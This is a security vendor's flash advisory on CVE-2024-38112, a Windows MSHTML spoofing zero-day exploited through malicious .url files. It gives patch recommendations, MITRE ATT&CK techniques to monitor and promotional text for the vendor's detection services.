Flash Notice: Critical Zero-Day Vulnerability Patched by Microsoft

overview

As a part of Microsoft’s Patch Tuesday, the company released a critical patch for CVE-2024-38112, a spoofing vulnerability in the Windows MSHTML Platform that has been actively exploited by attackers for over a year. The zero-day has been in use since January 2023 and was detected as recently as May 2024.  

CVE-2024-38112 affects the Windows MSHTML Platform and involves malicious Windows Internet Shortcut files (.url) that exploit the retired Internet Explorer (IE) browser, allowing attackers to execute remote code on Windows 10/11 systems. 

Attackers disguise these malicious files as benign URLs pointing to customized icons, deceiving users into opening them. By leveraging the MHTML: URI handler, these files force IE to open attacker-controlled websites, allowing for remote code execution. 

To prevent exploitation, administrators should apply Microsoft’s patch as soon as possible. 

avertium's recommendationS

• Administrators must apply the patch released by Microsoft to prevent URL files from triggering the MHTML: URI handler. See Microsoft’s advisory for guidance.  

• Users should be cautious when opening URL files from unknown sources and heed OS security warnings. 

how avertium is protecting our customers

IOCs ADDED TO OUR THREAT FEEDS

NOTE!: Avertium is actively searching across all monitored environments for the IoC’s listed below. If any are discovered, we will reach out to you directly. If your environment or portions of your environment are not currently being monitored, please reach out to your Service Delivery Manager. 

SHA 256 

TTPs TO MONITOR

1. Initial Access (Tactic ID: TA0001)

• Phishing: Spear Phishing Attachment (ID: T1566.001): The attacker sends an email with a malicious attachment that exploits the MSHTML vulnerability. 
• Phishing: Spear Phishing Link (ID: T1566.002): The attacker directs the user to a malicious website designed to exploit the vulnerability via a link in a phishing email or message. 

2. Execution (Tactic ID: TA0002)

• User Execution: Malicious File (ID: T1204.002): The attacker convinces the user to open a malicious file that exploits the vulnerability. 
• User Execution: Malicious Link (ID: T1204.001): The attacker gets the user to click on a malicious link, leading to the execution of exploit code. 

3. 3. Exfiltration (Tactic ID: TA0010)

• Exfiltration Over C2 Channel (ID: T1041): Sending collected data back to the attacker's server. 
• Exfiltration Over Web Service (ID: T1567): Using web services (like cloud storage) to exfiltrate data. 

ADDITIONAL SERVICE OFFERINGS

• Fusion MXDR  is the first MDR offering that fuse together all aspects of security operations into a living, breathing, threat-resistant XDR solution. By fusing insights from threat intelligence, security assessments, and vulnerability management into our MDR approach, Fusion MXDR offers a more informed, robust, and cost-effective approach to cybersecurity – one that is greater than the sum of its parts. 
  
• Minimizing the impact of a successful ransomware or malware attack requires detecting it as early in the attack as possible. A Security Information and Event Management (SIEM) system can help an organization to accomplish this. Avertium offers a comprehensive SIEM-based approach that increases the potential for detecting a ransomware infection before it deploys. SIEM provides a holistic overview of a company’s IT environment from a single point of view in terms of its specific security events, empowering teams to detect and analyze unusual behavior. 

SUPPORTING DOCUMENTATION